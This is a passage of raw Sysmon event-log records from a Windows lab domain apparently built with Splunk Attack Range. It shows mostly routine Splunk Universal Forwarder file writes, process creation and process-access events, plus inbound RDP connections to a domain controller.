Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF4226E834B9BE2303757232BD0EA28C,SHA256=D03EBE33DA74259AF293E5B07EFBAA56F79AB695D7D4047196E3791B6F9B0582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976883Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:53.881{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D015A6A9B3BCA882CCD9E4CF309E2798,SHA256=86B7742D8D20939285F1709BD7FC79C148B243DAAB6E3258F91151393F412AA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:53.799{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E560933781D885E4C080635C9AD83909,SHA256=7F3FF57E301130171752AD4D430B07BF3FD2EC17D15ED829174E5F1388E9C63F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:53.799{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42A404BADD2DC1855E94FD134C8E4CA0,SHA256=4D74DB54903348D66B4645E9B4BF7DDACA00E5802C1E4711EB4F75F89F14296A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:53.299{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AECAC94D572765334746BDC7CC3804C,SHA256=8CF0E1B4BDBFFC4087C0D0E23E3FD5FE6D6D811024FD498899F2806F1E188E97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976885Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:54.897{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5040F9C9F7F1C04EFDE06AD164DFF2FA,SHA256=84304E33C90EA5F5F99113333EEEDBA49217867F15377F2427933B7C68158A7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.915{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88BE-6151-F779-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.915{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.915{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.915{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.915{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.915{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-88BE-6151-F779-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.915{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88BE-6151-F779-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.900{5EBD8912-88BE-6151-F779-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001048284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:52.167{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-61009-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.383{5EBD8912-88BE-6151-F679-00000000FC01}57046008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.299{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB5510C53E6A0E3E47485990E541DBA7,SHA256=3318EE0B8FF9F441E78A0F4D9F07F320BBEB16C6DE72AD716263452C59AA77DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976884Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:54.569{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87AF7320F5C51206B54EC242A3CD71A0,SHA256=AA00316BE273C089DC030F575BA4464E0F8C0EA941DCB84BAA1ABF55AB70FEB1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.061{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88BE-6151-F679-00000000FC01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.061{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.061{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.061{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.061{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.061{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-88BE-6151-F679-00000000FC01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.061{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88BE-6151-F679-00000000FC01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:54.047{5EBD8912-88BE-6151-F679-00000000FC01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976888Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:55.897{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72BB7C4D1237E6D5F3DB1FB5AAAE2372,SHA256=0A6B3A24D52CF1214300AA260C0426F0878AE72681B31D1FAD7DBDF02892208F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:53.390{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59880-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.531{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88BF-6151-F879-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.531{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.531{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.531{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.531{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.531{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-88BF-6151-F879-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.531{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program 